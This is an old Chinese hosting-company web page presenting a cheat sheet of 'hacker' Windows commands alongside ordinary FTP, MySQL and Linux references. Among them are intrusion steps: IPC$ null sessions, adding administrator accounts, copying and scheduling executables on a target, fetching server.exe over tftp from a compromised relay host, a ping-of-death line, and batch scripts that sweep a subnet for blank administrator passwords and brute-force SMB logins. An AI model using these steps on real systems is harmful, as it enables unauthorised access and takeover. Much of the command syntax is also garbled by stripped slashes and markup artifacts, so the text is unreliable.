- 掛牌上市企業
- 60秒人工響應
- 99.99%連通率
- 7*24h人工
- 故障100倍補償
<ul id="mayc0"></ul> <ul id="mayc0"></ul> 黑客常用的dos命令詳解 |
| 發布時間: 2012/5/16 10:26:24 |
|
黑客常用的dos命令詳解 net use $ipipc$Content$nbsp; user 建立IPC空鏈接 net use $ipipc$Content$nbsp;密碼 user用戶名 建立IPC非空鏈接 net use h $ipc$Content$nbsp;密碼 user用戶名 直接登陸后映射對方C:到本地為H net use h $ipc$Content$nbsp;登陸后映射對方C:到本地為H net use $ipipc$Content$nbsp;del 刪除IPC鏈接 net use h del 刪除映射對方到本地的為H的映射 net user 用戶名 密碼 add 建立用戶 net user guest activeyes 激活guest用戶 net user 查看有哪些用戶 net user 帳戶名 查看帳戶的屬性 net localgroup administrators 用戶名 add 把“用戶”添加到管理員中使其具有管理員權限,注意:administrator后加s用復數 net start 查看開啟了哪些服務 net start 服務名 開啟服務;(如net start telnet, net start schedule) net stop 服務名 停止某服務 net time 目標ip 查看對方時間 net time 目標ip set 設置本地計算機時間與“目標IP”主機的時間同步,加上參數yes可取消確認信息 net view 查看本地局域網內開啟了哪些共享 net view ip 查看對方局域網內開啟了哪些共享 net config 顯示系統網絡設置 net logoff 斷開連接的共享 net pause 服務名 暫停某服務 net send ip 文本信息 向對方發信息 net ver 局域網內正在使用的網絡連接類型和信息 net share 查看本地開啟的共享 net share ipc$Content$nbsp;開啟ipc$共享 net share ipc$Content$nbsp;del 刪除ipc$共享 net share c$Content$nbsp;del 刪除C:共享 net user guest 12345 用guest用戶登陸后用將密碼改為12345 net password 密碼 更改系統登陸密碼 netstat -a 查看開啟了哪些端口,常用netstat -an netstat -n 查看端口的網絡連接情況,常用netstat -an netstat -v 查看正在進行的工作 netstat -p 協議名 例:netstat -p tcqip 查看某協議使用情況(查看tcpip協議使用情況) netstat -s 查看正在使用的所有協議使用情況 nbtstat -A ip 對方136到139其中一個端口開了的話,就可查看對方最近登陸的用戶名(03前的為用戶名)-注意:參數-A要大寫 tracert -參數 ip(或計算機名) 跟蹤路由(數據包),參數:“-w數字”用于設置超時間隔。 ping ip(或域名) 向對方主機發送默認大小為32字節的數據,參數:“-l[空格]數據包大小”;“-n發送數據次數”;“-t”指一直ping。 ping -t -l 65550 ip 死亡之ping(發送大于64K的文件并一直ping就成了死亡之ping) ipconfig (winipcfg) 用于windows NT及XP(windows 95 98)查看本地ip地址,ipconfig可用參數“all”顯示全部配置信息 tlist -t 以樹行列表顯示進程(為系統的附加工具,默認是沒有安裝的,在安裝目錄的Supporttools文件夾內) kill -F 進程名 加-F參數后強制結束某進程(為系統的附加工具,默認是沒有安裝的,在安裝目錄的Supporttools文件夾內) del -F 文件名 加-F參數后就可刪除只讀文件,AR、AH、AS、AA分別表示刪除只讀、隱藏、系統、存檔文件,A-R、A-H、A-S、A-A表示刪除除只讀、隱藏、系統、存檔以外的文件。例如“DELAR .”表示刪除當前目錄下所有只讀文件,“DELA-S .”表示刪除當前目錄下除系統文件以外的所有文件 del S Q 目錄 或用:rmdir s Q 目錄 S刪除目錄及目錄下的所有子目錄和文件。同時使用參數Q 可取消刪除操作時的系統確認就直接刪除。(二個命令作用相同) move 盤符路徑要移動的文件名 存放移動文件的路徑移動后文件名 移動文件,用參數y將取消確認移動目錄存在相同文件的提示就直接覆蓋 fc one.txt two.txt 3st.txt 對比二個文件并把不同之處輸出到3st.txt文件中, 和 是重定向命令 at id號 開啟已注冊的某個計劃任務 at delete 停止所有計劃任務,用參數yes則不需要確認就直接停止 at id號 delete 停止某個已注冊的計劃任務 at 查看所有的計劃任務 at ip time 程序名(或一個命令) r 在某時間運行對方某程序并重新啟動計算機 finger username @host 查看最近有哪些用戶登陸 telnet ip 端口 遠和登陸服務器,默認端口為23 open ip 連接到IP(屬telnet登陸后的命令) telnet 在本機上直接鍵入telnet 將進入本機的telnet copy 路徑文件名1 路徑文件名2 y 復制文件1到指定的目錄為文件2,用參數y就同時取消確認你要改寫一份現存目錄文件 copy csrv.exe $ipadmin$Content$nbsp;復制本地csrv.exe到對方的admin下 cppy 1st.jpgb+2st.txta 3st.jpg 將2st.txt的內容藏身到1st.jpg中生成3st.jpg新的文件,注:2st.txt文件頭要空三排,參數:b指二進制文件,a指ASCLL格式文件 copy $svv.exeipadmin$svv.exe c 或copyipadmin$. 復制對方admini$共享下的srv.exe文件(所有文件)至本地C: xcopy 要復制的文件或目錄樹 目標地址目錄名 復制文件和目錄樹,用參數Y將不提示覆蓋相同文件 tftp -i 自己IP(用肉機作跳板時這用肉機IP) get server.exe cserver.exe 登陸后,將“IP”的server.exe下載到目標主機cserver.exe 參數:-i指以二進制模式傳送,如傳送exe文件時用,如不加-i 則以ASCII模式(傳送文本文件模式)進行傳送 tftp -i 對方IP put cserver.exe 登陸后,上傳本地cserver.exe至主機 ftp ip 端口 用于上傳文件至服務器或進行文件操作,默認端口為21。bin指用二進制方式傳送(可執行文件進);默認為ASCII格式傳送(文本文件時) route print 顯示出IP路由,將主要顯示網絡地址Network addres,子網掩碼Netmask,網關地址Gateway addres,接口地址Interface arp 查看和處理ARP緩存,ARP是名字解析的意思,負責把一個IP解析成一個物理性的MAC地址。arp -a將顯示出全部信息 start 程序名或命令 max 或min 新開一個新窗口并最大化(最小化)運行某程序或命令 mem 查看cpu使用情況 attrib 文件名(目錄名) 查看某文件(目錄)的屬性 attrib 文件名 -A -R -S -H 或 +A +R +S +H 去掉(添加)某文件的 存檔,只讀,系統,隱藏 屬性;用+則是添加為某屬性 dir 查看文件,參數:Q顯示文件及目錄屬系統哪個用戶,TC顯示文件創建時間,TA顯示文件上次被訪問時間,TW上次被修改時間 date t 、 time t 使用此參數即“DATET”、“TIMET”將只顯示當前日期和時間,而不必輸入新日期和時間 set 指定環境變量名稱=要指派給變量的字符 設置環境變量 set 顯示當前所有的環境變量 set p(或其它字符) 顯示出當前以字符p(或其它字符)開頭的所有環境變量 pause 暫停批處理程序,并顯示出:請按任意鍵繼續.... if 在批處理程序中執行條件處理(更多說明見if命令及變量) goto 標簽 將cmd.exe導向到批處理程序中帶標簽的行(標簽必須單獨一行,且以冒號打頭,例如:“:start”標簽) call 路徑批處理文件名 從批處理程序中調用另一個批處理程序 (更多說明見call ) for 對一組文件中的每一個文件執行某個特定命令(更多說明見for命令及變量) echo on或off 打開或關閉echo,僅用echo不加參數則顯示當前echo設置 echo 信息 在屏幕上顯示出信息 echo 信息 pass.txt 將信息保存到pass.txt文件中 findstr Hello aa.txt 在aa.txt文件中尋找字符串hello find 文件名 查找某文件 title 標題名字 更改CMD窗口標題名字 color 顏色值 設置cmd控制臺前景和背景顏色;0=黑、1=藍、2=綠、3=淺綠、4=紅、5=紫、6=黃、7=白、8=灰、9=淡藍、A=淡綠、B=淡淺綠、C=淡紅、D=淡紫、E=淡黃、F=亮白 prompt 名稱 更改cmd.exe的顯示的命令提示符(把C、D統一改為:EntSky ) print 文件名 打印文本文件 ver 在DOS窗口下顯示版本信息 winver 彈出一個窗口顯示版本信息(內存大小、系統版本、補丁版本、計算機名) format 盤符 FS類型 格式化磁盤,類型FAT、FAT32、NTFS ,例:Format D FSNTFS md 目錄名 創建目錄 replace 源文件 要替換文件的目錄 替換文件 ren 原文件名 新文件名 重命名文件名 tree 以樹形結構顯示出目錄,用參數-f 將列出第個文件夾中文件名稱 type 文件名 顯示文本文件的內容 more 文件名 逐屏顯示輸出文件 doskey 要鎖定的命令=字符 doskey 要解鎖命令= 為DOS提供的鎖定命令(編輯命令行,重新調用win2k命令,并創建宏)。如:鎖定dir命令:doskey dir=entsky (不能用doskey dir=dir);解鎖: doskey dir= taskmgr 調出任務管理器 chkdsk F D 檢查磁盤D并顯示狀態報告;加參數f并修復磁盤上的錯誤 tlntadmn telnt服務admn,鍵入tlntadmn選擇3,再選擇8,就可以更改telnet服務默認端口23為其它任何端口 exit 退出cmd.exe程序或目前,用參數B則是退出當前批處理腳本而不是cmd.exe path 路徑可執行文件的文件名 為可執行文件設置一個路徑。 cmd 啟動一個win2K命令解釋窗口。參數:eff、en 關閉、開啟命令擴展;更我詳細說明見cmd regedit s 注冊表文件名 導入注冊表;參數S指安靜模式導入,無任何提示; regedit e 注冊表文件名 導出注冊表 cacls 文件名 參數 顯示或修改文件訪問控制列表(ACL)——針對NTFS格式時。參數:D 用戶名設定拒絕某用戶訪問;P 用戶名perm 替換指定用戶的訪問權限;G 用戶名perm 賦予指定用戶訪問權限;Perm 可以是 N 無,R 讀取, W 寫入, C 更改(寫入),F 完全控制;例:cacls Dtest.txt D pub 設定dtest.txt拒絕pub用戶訪問。 cacls 文件名 查看文件的訪問用戶權限列表 REM 文本內容 在批處理文件中添加注解 netsh 查看或更改本地網絡配置情況 IIS服務命令: iisreset reboot 重啟win2k計算機(但有提示系統將重啟信息出現) iisreset start或stop 啟動(停止)所有Internet服務 iisreset restart 停止然后重新啟動所有Internet服務 iisreset status 顯示所有Internet服務狀態 iisreset enable或disable 在本地系統上啟用(禁用)Internet服務的重新啟動 iisreset rebootonerror 當啟動、停止或重新啟動Internet服務時,若發生錯誤將重新開機 iisreset noforce 若無法停止Internet服務,將不會強制終止Internet服務 iisreset timeout Val在到達逾時間(秒)時,仍未停止Internet服務,若指定rebootonerror參數,則電腦將會重新開機。預設值為重新啟動20秒,停止60秒,重新開機0秒。 FTP 命令: (后面有詳細說明內容) ftp的命令行格式為 ftp -v -d -i -n -g[主機名] -v 顯示遠程服務器的所有響應信息。 -d 使用調試方式。 -n 限制ftp的自動登錄,即不使用.netrc文件。 -g 取消全局文件名。 help [命令] 或 ?[命令] 查看命令說明 bye 或 quit 終止主機FTP進程,并退出FTP管理方式. pwd 列出當前遠端主機目錄 put 或 send 本地文件名 [上傳到主機上的文件名] 將本地一個文件傳送至遠端主機中 get 或 recv [遠程主機文件名] [下載到本地后的文件名] 從遠端主機中傳送至本地主機中 mget [remote-files] 從遠端主機接收一批文件至本地主機 mput local-files 將本地主機中一批文件傳送至遠端主機 dir 或 ls [remote-directory] [local-file] 列出當前遠端主機目錄中的文件.如果有本地文件,就將結果寫至本地文件 ascii 設定以ASCII方式傳送文件(缺省值) bin 或 image 設定以二進制方式傳送文件 bell 每完成一次文件傳送,報警提示 cdup 返回上一級目錄 close 中斷與遠程服務器的ftp會話(與open對應) open host[port] 建立指定ftp服務器連接,可指定連接端口 delete 刪除遠端主機中的文件 mdelete [remote-files] 刪除一批文件 主機中建立目錄 rename [from] [to] 改變遠端主機中的文件名 rmdir directory-name 刪除遠端主機中的目錄 status 顯示當前FTP的狀態 system 顯示遠端主機系統類型 user user-name [password] [account] 重新以別的用戶名登錄遠端主機 open host [port] 重新建立一個新的連接 prompt 交互提示模式 macdef 定義宏命令 lcd 改變當前本地主機的工作目錄,如果缺省,就轉到當前用戶的HOME目錄 chmod 改變遠端主機的文件權限 case 當為ON時,用MGET命令拷貝的文件名到本地機器中,全部轉換為小寫字母 cd remote-dir 進入遠程主機目錄 cdup 進入遠程主機目錄的父目錄 ! 在本地機中執行交互shell,exit回到ftp環境,如!ls*.zip MYSQL 命令: mysql -h主機地址 -u用戶名 -p密碼 連接MYSQL;如果剛安裝好MYSQL,超級用戶root是沒有密碼的。 (例:mysql -h110.110.110.110 -Uroot -P123456 注u與root可以不用加空格,其它也一樣) exit 退出MYSQL mysqladmin -u用戶名 -p舊密碼 password 新密碼 修改密碼 grant select on 數據庫. to 用戶名@登錄主機 identified by 密碼; 增加新用戶。(注意:和上面不同,下面的因為是MYSQL環境中的命令,所以后面都帶一個分號作為命令結束符) show databases; 顯示數據庫列表。剛開始時才兩個數據庫:mysql和test。mysql庫很重要它里面有MYSQL的系統信息,我們改密碼和新增用戶,實際上就是用這個庫進行操作。 use mysql; show tables; 顯示庫中的數據表 describe 表名; 顯示數據表的結構 create database 庫名; 建庫 use 庫名; create table 表名 (字段設定列表); 建表 drop database 庫名; drop table 表名; 刪庫和刪表 delete from 表名; 將表中記錄清空 select from 表名; 顯示表中的記錄 mysqldump --opt schoolschool.bbb 備份數據庫:(命令在DOS的mysqlbin目錄下執行);注釋將數據庫school備份到school.bbb文件,school.bbb是一個文本文件,文件名任取,打開看看你會有新發現。 win2003系統下新增命令(實用部份): shutdown 參數 關閉或重啟本地或遠程主機。 參數說明:S 關閉主機,R 重啟主機, T 數字 設定延時的時間,范圍0~180秒之間, A取消開機,M IP 指定的遠程主機。 例:shutdown r t 0 立即重啟本地主機(無延時) taskill 參數 進程名或進程的pid 終止一個或多個任務和進程。 參數說明:PID 要終止進程的pid,可用tasklist命令獲得各進程的pid,IM 要終止的進程的進程名,F 強制終止進程,T 終止指定的進程及他所啟動的子進程。 tasklist 顯示當前運行在本地和遠程主機上的進程、服務、服務各進程的進程標識符(PID)。 參數說明:M 列出當前進程加載的dll文件,SVC 顯示出每個進程對應的服務,無參數時就只列出當前的進程。 Linux系統下基本命令: 要區分大小寫 uname 顯示版本信息(同win2K的 ver) dir 顯示當前目錄文件,ls -al 顯示包括隱藏文件(同win2K的 dir) pwd 查詢當前所在的目錄位置 cd cd ..回到上一層目錄,注意cd 與..之間有空格。cd 返回到根目錄。 cat 文件名 查看文件內容 cat abc.txt 往abc.txt文件中寫上內容。 more 文件名 以一頁一頁的方式顯示一個文本文件。 cp 復制文件 mv 移動文件 rm 文件名 刪除文件,rm -a 目錄名刪除目錄及子目錄 mkdir 目錄名 建立目錄 rmdir 刪除子目錄,目錄內沒有文檔。 chmod 設定檔案或目錄的存取權限 grep 在檔案中查找字符串 diff 檔案文件比較 find 檔案搜尋 date 現在的日期、時間 who 查詢目前和你使用同一臺機器的人以及Login時間地點 w 查詢目前上機者的詳細資料 whoami 查看自己的帳號名稱 groups 查看某人的Group passwd 更改密碼 history 查看自己下過的命令 ps 顯示進程狀態 kill 停止某進程 gcc 黑客通常用它來編譯C語言寫的文件 su 權限轉換為指定使用者 telnet IP telnet連接對方主機(同win2K),當出現bash$時就說明連接成功。 ftp ftp連接上某服務器(同win2K) 附:批處理命令與變量 1:for命令及變量 基本格式: FOR 參數 %variable IN (set) DO command [command_parameters] %variable指定一個單一字母可替換的參數,如:%i ,而指定一個變量則用:%%i ,而調用變量時用:%i% ,變量是區分大小寫的(%i 不等于 %I)。 批處理每次能處理的變量從%0—%9共10個,其中%0默認給批處理文件名使用,%1默認為使用此批處理時輸入的的第一個值,同理:%2—%9指輸入的第2-9個值;例:net use $ipipc$Content$nbsp;pass useruser 中ip為%1,pass為%2 ,user為%3 (set)指定一個或一組文件,可使用通配符,如:(Duser.txt)和(1 1 254)(1 -1 254),{“(1 1 254)”第一個1指起始值,第二個1指增長量,第三個254指結束值,即:從1到254;“(1 -1 254)”說明:即從254到1} command:指定對第個文件執行的命令,如:net use命令;如要執行多個命令時,命令這間加:& 來隔開 command_parameters:為特定命令指定參數或命令行開關 IN (set):指在(set)中取值;DO command :指執行command 參數:L 指用增量形式{(set)為增量形式時};F 指從文件中不斷取值,直到取完為止{(set)為文件時,如(dpass.txt)時}。 用法舉例: @echo off echo 用法格式:test.bat .. test.txt for L %%G in (1 1 254) do echo %1.%%G test.txt & net use %1.%%G useradministrator find 命令成功完成 test.txt 存為test.bat 說明:對指定的一個C類網段的254個IP依次試建立administrator密碼為空的IPC$連接,如果成功就把該IP存在test.txt中。 L指用增量形式(即從1-254或254-1);輸入的IP前面三位:..為批處理默認的 %1;%%G 為變量(ip的最后一位);& 用來隔開echo 和net use 這二個命令; 指建立了ipc$后,在結果中用find查看是否有命令成功完成信息;%1.%%G 為完整的IP地址;(1 1 254) 指起始值,增長量,結止值。 @echo off echo 用法格式:ok.bat ip FOR F %%i IN (Duser.dic) DO smb.exe %1 %%i Dpass.dic 200 存為:ok.exe 說明:輸入一個IP后,用字典文件dpass.dic來暴解duser.dic中的用戶密碼,直到文件中值取完為止。%%i為用戶名;%1為輸入的IP地址(默認)。 本文出自:億恩科技【www.vbseamall.com】 |
0371-60135900
京公網安備41019702002023號
香港服務器租用
美國服務器租用
電信骨干機房
聯通骨干機房
